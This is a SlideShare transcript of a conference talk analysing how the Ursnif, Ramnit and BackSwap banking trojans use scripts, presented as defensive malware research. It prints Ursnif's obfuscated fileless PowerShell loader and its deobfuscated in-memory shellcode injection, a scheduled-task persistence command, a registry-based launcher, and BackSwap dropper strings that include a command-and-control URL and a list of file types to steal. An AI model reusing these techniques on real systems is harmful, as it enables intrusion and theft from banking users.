SlideShare a Scribd company logo

"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top Banking Trojans" - Ophir Harpaz & Or Safran

PROIDEA, profile picture
PROIDEA

The document discusses the evolving techniques of financial malware, particularly focusing on banking trojans like Ursnif, Ramnit, and Backswap. It outlines how these threats utilize automated scripts and methods such as session hijacking, web injections, and fileless malware to steal user credentials and conduct transactions. Key insights include the importance of script-based execution for evading antivirus detection and the persistence techniques employed by these threats.

Technology
Related topics:
Information Security IT Security
1 of 78
Downloaded 26 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
Revenge of The Script Kiddies Uses of Automated Scripts by Top Banking Trojans
Agenda ● Financial Malware - Goals & Techniques ● Scripts in Today’s Banking Trojans ○ Ursnif (ISFB) ○ Ramnit ○ BackSwap ● Conclusions
Who We Are Ophir Harpaz Security Researcher @ Guardicore @ophirharpaz author of https://begin.re Or Safran Senior Security Researcher @ Proofpoint @orsafr Both formerly in Trusteer, IBM Security
Financial Malware - Concept ● Wait until an online banking session takes place ● Hijack the session Note: target is the end user, not the bank!
Financial Malware - Goal
The Goal - Money ● In-Session ○ Wire transfer initiation ○ IBAN/Account # Swap ● Account Take-Over (ATO) ○ Browser Fingerprinting ○ RATs
Financial Malware - Flow ● Infect the machine ● Gain control over the browser ● Perform desired actions ○ Inject code, visual elements, communication functionality ○ Redirect user to a fake website ● Profit
Infection Most popular method - spam emails with malicious attachments / links
Persistence Startup folder, registry keys, task scheduler… You know the gig
Control over the Browser Usually done by code injection into the browser process & hooking of API functions
Attack Web-Inject Insert malicious code into the original webpage’s source Redirect Redirect the user to a fake website, tailor-made by the attacker
Web Injections
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top Banking Trojans" - Ophir Harpaz & Or Safran
Malware Configuration The malware stores attacks in a configuration
Malware Configuration
Scripting in Today’s Bankers
Ursnif (Gozi, ISFB)
Background ● Well-known and widely-spread Banking Trojan ○ Source-code leaked ● To investigate its web-injects, we needed a way to infect machines
Infection Attempts clean machine machine with configuration run sample run sample
Our Goal - Infection ● We had: ○ Ursnif DLL ○ registry of infected machine Infection fails - no web-injects in browser :(
Infection Script - Fool Ursnif ● Ursnif cares for SID (Security Identifier) ○ SID used as seed… ;) ● We wrote an infection script: ○ change the machine’s SID (SIDCHG) ○ “feed” the local registry ○ run the DLL ● ✅ Infected
Uh Oh... ● Ursnif decides to go “fileless” → No DLL - just registry
Fileless Executable
Raw Powershell function bnfrytqqcw { [System.Convert]::FromBase64String($args[0]); }; [byte[]] $hyxyftq = bnfrytqqcw("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA"); function yjklopnn { $kkc = bnfrytqqcw($args[0]); [System.Text.Encoding]::ASCII.GetString($kkc); }; iex(yjklopnn("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo=")); iex(yjklopnn("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
What We Know ✅ function toIntArray { [System.Convert]::FromBase64String($args[0]); }; [byte[]] $data = toIntArray("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA"); ✅ function toString { $intArray = toIntArray($args[0]); [System.Text.Encoding]::ASCII.GetString($intArray); }; iex(toString("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo=")); iex(toString("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
$data [byte[]] $data = toIntArray("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA"); … after Base64 decoding:
What We Know ✅ function toIntArray { [System.Convert]::FromBase64String($args[0]); }; ✅ [byte[]] $payload = toIntArray("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA"); ✅ function toString { $intArray = toIntArray($args[0]); [System.Text.Encoding]::ASCII.GetString($intArray); }; iex(toString("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo=")); iex(toString("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
iex #1 iex(toString("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo="));
iex #1 iex(“$txav="[DllImport(`"kernel32`")]`npublic static extern IntPtr GetCurrentThreadId();`n[DllImport(`"kernel32`")]`npublic static extern IntPtr OpenThread(uint mnnfsjxl,uint quq,IntPtr umtb);`n[DllImport(`"kernel32`")]`npublic static extern uint QueueUserAPC(IntPtr plvridkgu,IntPtr ire,IntPtr vvdbhcmmnva);`n[DllImport(`"kernel32`")]`npublic static extern void SleepEx(uint ahw,uint lus);";$cfd=Add-Type -memberDefinition $txav - Name 'pptch' -namespace Win32Functions - passthru;$pjovfxnn="unkua";$vfyj="[DllImport(`"kernel32`")]`npublic static extern IntPtr GetCurrentProcess();`n[DllImport(`"kernel32`")]`npublic static extern IntPtr VirtualAllocEx(IntPtr xqfl,IntPtr jxmfwqfmtio,uint kkqvje,uint tuautkhbqn,uint hgbbpqulgva);";$aholdl=Add-Type -memberDefinition $vfyj -Name 'robpgotb' -namespace Win32Functions -passthru;”));
iex #1 $txav = "[DllImport("kernel32")] public static extern IntPtr GetCurrentThreadId(); [DllImport("kernel32")] public static extern IntPtr OpenThread(uint mnnfsjxl,uint quq,IntPtr umtb); [DllImport("kernel32")] public static extern uint QueueUserAPC(IntPtr plvridkgu,IntPtr ire,IntPtr vvdbhcmmnva); [DllImport("kernel32")] public static extern void SleepEx(uint ahw,uint lus);"; $cfd = Add-Type -memberDefinition $txav -Name 'pptch' -namespace Win32Functions -passthru;
iex #1 - cont. $vfyj="[DllImport("kernel32")] public static extern IntPtr GetCurrentProcess(); [DllImport("kernel32")] public static extern IntPtr VirtualAllocEx(IntPtr xqfl,IntPtr jxmfwqfmtio,uint kkqvje,uint tuautkhbqn,uint hgbbpqulgva);"; $aholdl = Add-Type -memberDefinition $vfyj -Name 'robpgotb' - namespace Win32Functions -passthru;”));
What We Know ✅ function toIntArray { [System.Convert]::FromBase64String($args[0]); }; ✅ [byte[]] $payload = toIntArray("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA"); ✅ function toString { $intArray = toIntArray($args[0]); [System.Text.Encoding]::ASCII.GetString($intArray); }; ✅ iex(toString("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo=")); iex(toString("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
iex #2 iex(toString("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
iex #2 iex(“if($usedf=$aholdl::VirtualAllocEx($aholdl::GetCurrentProcess(),0 ,$hyxyftq.Length,12288,64)){[System.Runtime.InteropServices.Marshal]: :Copy($hyxyftq,0,$usedf,$hyxyftq.length);if($cfd::QueueUserAPC($usedf ,$cfd::OpenThread(16,0,$cfd::GetCurrentThreadId()),$usedf)){$cfd::Sle epEx(3,1);}}”);
iex #2 if ($buffer = VirtualAllocEx(GetCurrentProcess(), 0, $payload.Length, 0x3000, 0x40)) { Copy($payload, 0, $buffer, $payload.length); if (QueueUserAPC($buffer, OpenThread(0x10, 0, GetCurrentThreadId()), $buffer)) { SleepEx(3, 1); } }
PS Script - Summary ● Adds classes to the Powershell session to enable calling Windows API functions ● Allocates, writes and executes code in the memory of the current process’s address space
How Is This Executed?
Scheduled Task forfiles /p C:Windowssystem32 /s /c "cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwA SQBkAGUAbgB0AGkAdABpAGUAcwBcAHsAMwA5AEUA QwAyAEUARQAxAC0ANgBGADIAMAAtAEUAMgBEADMA LQA2AEMAQgA5AC0AMwBEADYAMgAxADQAQgAzAEEA OAA0ADEAfQAnACkALgBTAA==" /m p*ll.*e
Running The Script Powershell.exe “iex (gp 'HKCU:Identities<SID>').S”
Why Script? ● Fileless malware = stealthier malware ○ Evades AVs scanner modules ● Suspicious activity is done from within a “legitimate” process
Ramnit
Windows DPAPI (Data Protection API) ● Simple cryptographic API, since windows 2000 ● Enables symmetric encryption of any kind of data ● 2 different scopes (CurrentUser and LocalMachine) ● Sounds promising
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top Banking Trojans" - Ophir Harpaz & Or Safran
DPAPI mostly sounds promising ● In the words of Benjamin Delpy: “Friends don't let friends save passwords with DPAPI; You know it's ~like cleartext passwords?” ● Many applications use it for legit reasons, e.g. Chrome ● Has a decryptor written by Nirsoft mimikatz # coffee ( ( ) ) .______. | |] / `----'
LOLBAS ● Living-Off-The-Land Binaries and Scripts (and also Libraries) ● Coined by Christopher Campbell & Matt Graeber ● Repo currently has 96 binaries
AMSI Antimalware Scan Interface ● Part of Windows 10 ● interface standard that allows apps to integrate with antimalware products ● Bypassed few times, by CyberArk using memory patching
Ramnit - Background ● Operating since 2010, taken down at 2015 ● New versions released ~weekly ● Camellia - Latest known financial module ● 100K Machines in two months ● HVNC, keylogger, screenlog, cookie-grabber, form-grabber, MITB injections and more
It all starts with an “innocent looking” scheduled task It’s well known that every randomly generated name at the scheduled task list is legit
Ramnit’s Folder 1. .vbs 2. .ps1 3. .txt
VBS Microsoft, please...
Powershell
The .txt file... … is exactly what you expect it to be - sh**
Decrypted .txt File
The Smoking Gun # This is still GetProcAddress, but instead of PowerShell converting the string to a pointer, you must do it yourself This doesn't look like “yourself”, or really bad opsec Google yielded Invoke-ReflectivePEInjection.ps1
Ramnit vs. Github
Some Add-Ons
RuntimeCheck.dll
Decrypted & Deobfuscated
Architecture Scheduled Task VB Script .txtPowershell .exe runs reads, decrypts and runs
Why Scripts? ● Multi-purpose ○ Decryption of .txt file ○ AMSI bypass ○ Code injection ● Ramnit’s Specialties ○ Multiple languages ○ Complex architecture
BackSwap (Ostap)
BackSwap ● First spotted in March 2018 ● Polish targets → Spanish banks ● Simple yet pretty cool techniques for injection and credentials theft
BackSwap is COOL ● Greatly detailed by Michal Poslusny & Peter Kalnai and Itay Cohen
Once Upon a Time ● Fraud reported ● End-user shared the sample with us ● We got these:
This is not a sample. ● What is it? ● Quick-and-dirty static analysis
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top Banking Trojans" - Ophir Harpaz & Or Safran
What are These? ● eight .jse files - JavaScript Encoded ● ScrDec to the rescue
Only 60k * 8 = 480,000 LoCs to read
Brief Look two unescape functions - called thousands of times function Sdercfgvbhyj(d, f) { return unescape(d); }; function Dertpolog(q, w, y) { return unescape(y); };
Escape the unescape Let’s accumulate their return values accumulatedString = ‘’; function Sdercfgvbhyj(d, f) { accumulatedString += unescape(d); return unescape(d); }; function Dertpolog(q, w, y) { accumulatedString += unescape(d); return unescape(y); }; ... WScript.Echo(accumulatedString);
Escape the unescape we got: c:UsersElizabethDesktop>cscript cert.js Microsoft (R) Windows Script Host Version 5.812 Copyright (C) Microsoft Corporation. All rights reserved. EnumeratorActiveXObjectWScriptScriptFullNameGetObjectScripting.FileSystemObjectC reateObjectWScript.ShellADODB.StreamShell.ApplicationMsxml2.ServerXMLHTTPfromCha rCodeExpandEnvironmentStrings%USERPROFILE%fromCharCodefromCharCodeExpandEnvironm entStrings%TEMP%floorrandomNameSpacecert.jse&pref=tysonhttps://185.209.160.50/ba tya1/footer.php?oxx=fo10MZPOSTSelfPath2050000-f -decode 4294967295Drives*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpdLafamiliaestodo.txt
Escape the unescape we got: c:UsersElizabethDesktop>cscript cert.js Microsoft (R) Windows Script Host Version 5.812 Copyright (C) Microsoft Corporation. All rights reserved. EnumeratorActiveXObjectWScriptScriptFullNameGetObjectScripting.FileSystemObjectC reateObjectWScript.ShellADODB.StreamShell.ApplicationMsxml2.ServerXMLHTTPfromCha rCodeExpandEnvironmentStrings%USERPROFILE%fromCharCodefromCharCodeExpandEnvironm entStrings%TEMP%floorrandomNameSpacecert.jse&pref=tysonhttps://185.209.160.50/ba tya1/footer.php?oxx=fo10MZPOSTSelfPath2050000-f -decode 4294967295Drives*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpdLafamiliaestodo.txt
Wrapping Up ● This is actually the BackSwap dropper, dubbed Ostap1 or Nemucod ● BackSwap recently moved to Powershell instead of JSE2 [1] Ostap analysis by Cert.pl [2] CheckPoint Research tweet
CONclusions
CONclusions ● Bankers tend to move functionality from binaries to scripts ○ Infection (download) ○ Execution ○ Encryption ● Why? ○ AV evasion ○ Laziness ○ It works
We’re done.
Questions? @OphirHarpaz @OrSafr
IOCs Ursnif 4265E7A393B96AE4E7302541419CA0A5 Ramnit B23F633D0A64E2E44E546558C9C42C8F Backswap 0A5D0AAD2A352B047DABECE87DCAF5D2

More Related Content

PDF
"A rootkits writer’s guide to defense" - Michal Purzynski
PROIDEA
 
PDF
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
PDF
Laura Garcia - Shodan API and Coding Skills [rooted2019]
RootedCON
 
PDF
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
PROIDEA
 
PDF
We need t go deeper - Testing inception apps.
SecuRing
 
PDF
Threat stack aws
Jen Andre
 
PDF
The day I ruled the world (RootedCON 2020)
Javier Junquera
 
PPTX
Passwords#14 - mimikatz
Benjamin Delpy
 
"A rootkits writer’s guide to defense" - Michal Purzynski
PROIDEA
 
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
RootedCON
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
PROIDEA
 
We need t go deeper - Testing inception apps.
SecuRing
 
Threat stack aws
Jen Andre
 
The day I ruled the world (RootedCON 2020)
Javier Junquera
 
Passwords#14 - mimikatz
Benjamin Delpy
 

What's hot (20)

PDF
Python Cryptography & Security
Jose Manuel Ortega Candel
 
PDF
Wtf is happening_inside_my_android_phone_public
Jaime Blasco
 
PPTX
Unsecuring SSH
Jeremy Brown
 
PPTX
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Nahidul Kibria
 
PDF
Da APK al Golden Ticket
Giuseppe Trotta
 
PPTX
Attacking Big Data Land
Jeremy Brown
 
PDF
Assume Compromise
Zach Grace
 
PPTX
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
PPTX
Summer of Fuzz: macOS
Jeremy Brown
 
PPTX
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat Security Conference
 
PDF
Ethical hacking with Python tools
Jose Manuel Ortega Candel
 
ODP
Joxean Koret - Database Security Paradise [Rooted CON 2011]
RootedCON
 
PDF
Codetainer: a Docker-based browser code 'sandbox'
Jen Andre
 
PDF
Veil-PowerView - NovaHackers
VeilFramework
 
PDF
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
RootedCON
 
PPTX
Advanced Weapons Training for the Empire
Jeremy Johnson
 
PPTX
Abusing Microsoft Kerberos - Sorry you guys don't get it
Benjamin Delpy
 
PPTX
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat Security Conference
 
PDF
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Positive Hack Days
 
PPTX
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
CODE BLUE
 
Python Cryptography & Security
Jose Manuel Ortega Candel
 
Wtf is happening_inside_my_android_phone_public
Jaime Blasco
 
Unsecuring SSH
Jeremy Brown
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Nahidul Kibria
 
Da APK al Golden Ticket
Giuseppe Trotta
 
Attacking Big Data Land
Jeremy Brown
 
Assume Compromise
Zach Grace
 
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
Summer of Fuzz: macOS
Jeremy Brown
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat Security Conference
 
Ethical hacking with Python tools
Jose Manuel Ortega Candel
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
RootedCON
 
Codetainer: a Docker-based browser code 'sandbox'
Jen Andre
 
Veil-PowerView - NovaHackers
VeilFramework
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
RootedCON
 
Advanced Weapons Training for the Empire
Jeremy Johnson
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Benjamin Delpy
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat Security Conference
 
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Positive Hack Days
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
CODE BLUE
 
Ad

Similar to "Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top Banking Trojans" - Ophir Harpaz & Or Safran (20)

PDF
More about PHP
Jonathan Francis Roscoe
 
PDF
Ruxmon.2013-08.-.CodeBro!
Christophe Alladoum
 
PDF
Higher Level Malware
CTruncer
 
PDF
NSC #2 - Challenge Solution
NoSuchCon
 
PDF
A Battle Against the Industry - Beating Antivirus for Meterpreter and More
CTruncer
 
PDF
Skiron - Experiments in CPU Design in D
Mithun Hunsur
 
PDF
C# as a System Language
ScyllaDB
 
PDF
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
PPTX
I hunt sys admins 2.0
Will Schroeder
 
ODP
Linux kernel tracing superpowers in the cloud
Andrea Righi
 
ODP
Node js lecture
Darryl Sherman
 
PPTX
2019: A Local Hacking Odyssey - MITM attack against password manager @ BSides...
Soya Aoyama
 
PDF
The Supporting Role of Antivirus Evasion while Persisting
CTruncer
 
PDF
Anatomy of PHP Shells
Vedran Krivokuca
 
PDF
Original slides from Ryan Dahl's NodeJs intro talk
Aarti Parikh
 
PDF
Possibility of arbitrary code execution by Step-Oriented Programming by Hiroa...
CODE BLUE
 
PDF
Possibility of arbitrary code execution by Step-Oriented Programming
kozossakai
 
PDF
Node.js for Rubists
Sagiv Ofek
 
PDF
Finding Xori: Malware Analysis Triage with Automated Disassembly
Priyanka Aash
 
KEY
Ein Stall voller Trüffelschweine - (PHP-)Profiling-Tools im Überblick
renebruns
 
More about PHP
Jonathan Francis Roscoe
 
Ruxmon.2013-08.-.CodeBro!
Christophe Alladoum
 
Higher Level Malware
CTruncer
 
NSC #2 - Challenge Solution
NoSuchCon
 
A Battle Against the Industry - Beating Antivirus for Meterpreter and More
CTruncer
 
Skiron - Experiments in CPU Design in D
Mithun Hunsur
 
C# as a System Language
ScyllaDB
 
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
I hunt sys admins 2.0
Will Schroeder
 
Linux kernel tracing superpowers in the cloud
Andrea Righi
 
Node js lecture
Darryl Sherman
 
2019: A Local Hacking Odyssey - MITM attack against password manager @ BSides...
Soya Aoyama
 
The Supporting Role of Antivirus Evasion while Persisting
CTruncer
 
Anatomy of PHP Shells
Vedran Krivokuca
 
Original slides from Ryan Dahl's NodeJs intro talk
Aarti Parikh
 
Possibility of arbitrary code execution by Step-Oriented Programming by Hiroa...
CODE BLUE
 
Possibility of arbitrary code execution by Step-Oriented Programming
kozossakai
 
Node.js for Rubists
Sagiv Ofek
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Priyanka Aash
 
Ein Stall voller Trüffelschweine - (PHP-)Profiling-Tools im Überblick
renebruns
 
Ad

Recently uploaded (20)

PPTX
sap open course for s4hana steps from ECC to s4
sreeni2106invites
 
PPTX
MYSQL Presentation for SQL database connectivity
Swati270511
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PDF
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
PDF
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
sap open course for s4hana steps from ECC to s4
sreeni2106invites
 
MYSQL Presentation for SQL database connectivity
Swati270511
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
Teaching material agriculture food technology
LiaRayya
 
Cloud computing and distributed systems.
kkkkkhan
 
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 

"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top Banking Trojans" - Ophir Harpaz & Or Safran

  • 1. Revenge of The Script Kiddies Uses of Automated Scripts by Top Banking Trojans
  • 2. Agenda ● Financial Malware - Goals & Techniques ● Scripts in Today’s Banking Trojans ○ Ursnif (ISFB) ○ Ramnit ○ BackSwap ● Conclusions
  • 3. Who We Are Ophir Harpaz Security Researcher @ Guardicore @ophirharpaz author of https://begin.re Or Safran Senior Security Researcher @ Proofpoint @orsafr Both formerly in Trusteer, IBM Security
  • 4. Financial Malware - Concept ● Wait until an online banking session takes place ● Hijack the session Note: target is the end user, not the bank!
  • 6. The Goal - Money ● In-Session ○ Wire transfer initiation ○ IBAN/Account # Swap ● Account Take-Over (ATO) ○ Browser Fingerprinting ○ RATs
  • 7. Financial Malware - Flow ● Infect the machine ● Gain control over the browser ● Perform desired actions ○ Inject code, visual elements, communication functionality ○ Redirect user to a fake website ● Profit
  • 8. Infection Most popular method - spam emails with malicious attachments / links
  • 9. Persistence Startup folder, registry keys, task scheduler… You know the gig
  • 10. Control over the Browser Usually done by code injection into the browser process & hooking of API functions
  • 11. Attack Web-Inject Insert malicious code into the original webpage’s source Redirect Redirect the user to a fake website, tailor-made by the attacker
  • 14. Malware Configuration The malware stores attacks in a configuration
  • 18. Background ● Well-known and widely-spread Banking Trojan ○ Source-code leaked ● To investigate its web-injects, we needed a way to infect machines
  • 20. Our Goal - Infection ● We had: ○ Ursnif DLL ○ registry of infected machine Infection fails - no web-injects in browser :(
  • 21. Infection Script - Fool Ursnif ● Ursnif cares for SID (Security Identifier) ○ SID used as seed… ;) ● We wrote an infection script: ○ change the machine’s SID (SIDCHG) ○ “feed” the local registry ○ run the DLL ● ✅ Infected
  • 22. Uh Oh... ● Ursnif decides to go “fileless” → No DLL - just registry
  • 24. Raw Powershell function bnfrytqqcw { [System.Convert]::FromBase64String($args[0]); }; [byte[]] $hyxyftq = bnfrytqqcw("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA"); function yjklopnn { $kkc = bnfrytqqcw($args[0]); [System.Text.Encoding]::ASCII.GetString($kkc); }; iex(yjklopnn("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo=")); iex(yjklopnn("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
  • 25. What We Know ✅ function toIntArray { [System.Convert]::FromBase64String($args[0]); }; [byte[]] $data = toIntArray("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA"); ✅ function toString { $intArray = toIntArray($args[0]); [System.Text.Encoding]::ASCII.GetString($intArray); }; iex(toString("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo=")); iex(toString("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
  • 27. What We Know ✅ function toIntArray { [System.Convert]::FromBase64String($args[0]); }; ✅ [byte[]] $payload = toIntArray("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA"); ✅ function toString { $intArray = toIntArray($args[0]); [System.Text.Encoding]::ASCII.GetString($intArray); }; iex(toString("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo=")); iex(toString("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
  • 29. iex #1 iex(“$txav="[DllImport(`"kernel32`")]`npublic static extern IntPtr GetCurrentThreadId();`n[DllImport(`"kernel32`")]`npublic static extern IntPtr OpenThread(uint mnnfsjxl,uint quq,IntPtr umtb);`n[DllImport(`"kernel32`")]`npublic static extern uint QueueUserAPC(IntPtr plvridkgu,IntPtr ire,IntPtr vvdbhcmmnva);`n[DllImport(`"kernel32`")]`npublic static extern void SleepEx(uint ahw,uint lus);";$cfd=Add-Type -memberDefinition $txav - Name 'pptch' -namespace Win32Functions - passthru;$pjovfxnn="unkua";$vfyj="[DllImport(`"kernel32`")]`npublic static extern IntPtr GetCurrentProcess();`n[DllImport(`"kernel32`")]`npublic static extern IntPtr VirtualAllocEx(IntPtr xqfl,IntPtr jxmfwqfmtio,uint kkqvje,uint tuautkhbqn,uint hgbbpqulgva);";$aholdl=Add-Type -memberDefinition $vfyj -Name 'robpgotb' -namespace Win32Functions -passthru;”));
  • 30. iex #1 $txav = "[DllImport("kernel32")] public static extern IntPtr GetCurrentThreadId(); [DllImport("kernel32")] public static extern IntPtr OpenThread(uint mnnfsjxl,uint quq,IntPtr umtb); [DllImport("kernel32")] public static extern uint QueueUserAPC(IntPtr plvridkgu,IntPtr ire,IntPtr vvdbhcmmnva); [DllImport("kernel32")] public static extern void SleepEx(uint ahw,uint lus);"; $cfd = Add-Type -memberDefinition $txav -Name 'pptch' -namespace Win32Functions -passthru;
  • 31. iex #1 - cont. $vfyj="[DllImport("kernel32")] public static extern IntPtr GetCurrentProcess(); [DllImport("kernel32")] public static extern IntPtr VirtualAllocEx(IntPtr xqfl,IntPtr jxmfwqfmtio,uint kkqvje,uint tuautkhbqn,uint hgbbpqulgva);"; $aholdl = Add-Type -memberDefinition $vfyj -Name 'robpgotb' - namespace Win32Functions -passthru;”));
  • 32. What We Know ✅ function toIntArray { [System.Convert]::FromBase64String($args[0]); }; ✅ [byte[]] $payload = toIntArray("6SvaAACGBgCkqZBcAAAAAAAAAADwACIgCwIIAADaAAAALg...AAAA"); ✅ function toString { $intArray = toIntArray($args[0]); [System.Text.Encoding]::ASCII.GetString($intArray); }; ✅ iex(toString("DQokdHhhdj0iW0RsbEltcG9ydChgImtlcm5lbDMy...7DQo=")); iex(toString("DQokdWdyYmQ9ImRrdGZmZW1wZyI7aWYoJHVzZWRm...9fQ0K"));
  • 35. iex #2 if ($buffer = VirtualAllocEx(GetCurrentProcess(), 0, $payload.Length, 0x3000, 0x40)) { Copy($payload, 0, $buffer, $payload.length); if (QueueUserAPC($buffer, OpenThread(0x10, 0, GetCurrentThreadId()), $buffer)) { SleepEx(3, 1); } }
  • 36. PS Script - Summary ● Adds classes to the Powershell session to enable calling Windows API functions ● Allocates, writes and executes code in the memory of the current process’s address space
  • 37. How Is This Executed?
  • 38. Scheduled Task forfiles /p C:Windowssystem32 /s /c "cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwA SQBkAGUAbgB0AGkAdABpAGUAcwBcAHsAMwA5AEUA QwAyAEUARQAxAC0ANgBGADIAMAAtAEUAMgBEADMA LQA2AEMAQgA5AC0AMwBEADYAMgAxADQAQgAzAEEA OAA0ADEAfQAnACkALgBTAA==" /m p*ll.*e
  • 39. Running The Script Powershell.exe “iex (gp 'HKCU:Identities<SID>').S”
